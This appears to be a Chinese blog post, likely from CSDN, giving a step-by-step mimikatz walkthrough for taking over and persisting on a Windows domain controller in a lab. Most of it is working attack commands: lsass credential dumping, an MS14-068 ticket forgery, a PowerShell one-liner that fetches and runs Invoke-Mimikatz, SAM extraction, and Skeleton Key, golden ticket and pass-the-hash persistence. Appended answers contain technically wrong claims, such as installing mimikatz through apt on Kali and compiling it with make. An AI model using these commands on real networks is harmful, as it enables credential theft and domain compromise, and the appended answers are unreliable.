内网渗透中mimikatz的使用

0x01 简介

mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

0x02 测试环境

网络资源管理模式:


已有资源:

域内一台主机权限
操作系统:win7 x64
域权限:普通用户

0x03 测试目标

1、获得域控权限 2、导出所有用户口令 3、维持域控权限

0x04 测试过程

1、获取本机信息

mimikatz:

privilege::debug
sekurlsa::logonpasswords

获取本机用户名、口令、sid、LM hash、NTLM hash 如图
这里写图片描述

2、攻击域控,获得权限

使用ms14-068漏洞

ms14-068.exe -u -p -s -d
生成伪造缓存test.ccache:
这里写图片描述
导入伪造缓存: mimikatz:

kerberos::ptc test.ccache
登陆:

net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$

这里写图片描述
3、导出域(1)直接获取内存口令 mimikatz:

privilege::debug
sekurlsa::logonpasswords2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full3)通过powershell加载mimikatz获取口令

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:

lsadump::sam SYSTEM.hiv SAM.hiv持域控权限

(1)Skeleton Key mimikatz:
privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
4、维持域控权限

(1)Skeleton Key mimikatz:

privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test

这里写图片描述
(2)golden ticket mimikatz:

lsadump::lsa /patch
获取krbtgt的ntlmhash,如图
这里写图片描述

生成万能票据: mimikatz:

kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
导入票据: mimikatz:

kerberos::ptt test.kirbi
登陆域控:

net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$

这里写图片描述

Tips:

Golden Ticket不多说,自行理解
By default, the Golden Ticket default lifetime is 10 years
password changing/smartcard usage does not invalidate Golden Ticket;
this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed;
NTLM hash of krbtgt account is never changed automatically.
(3)Pass-The-Hash mimikatz:

sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

这里写图片描述

5、补充

登陆域控,刷新扫雷记录,留下名字;D mimikatz:

minesweeper::infos
如图
这里写图片描述

  • 8
    点赞
  • 69
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过KaliMimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过KaliMimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境使用。在实际的工作,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值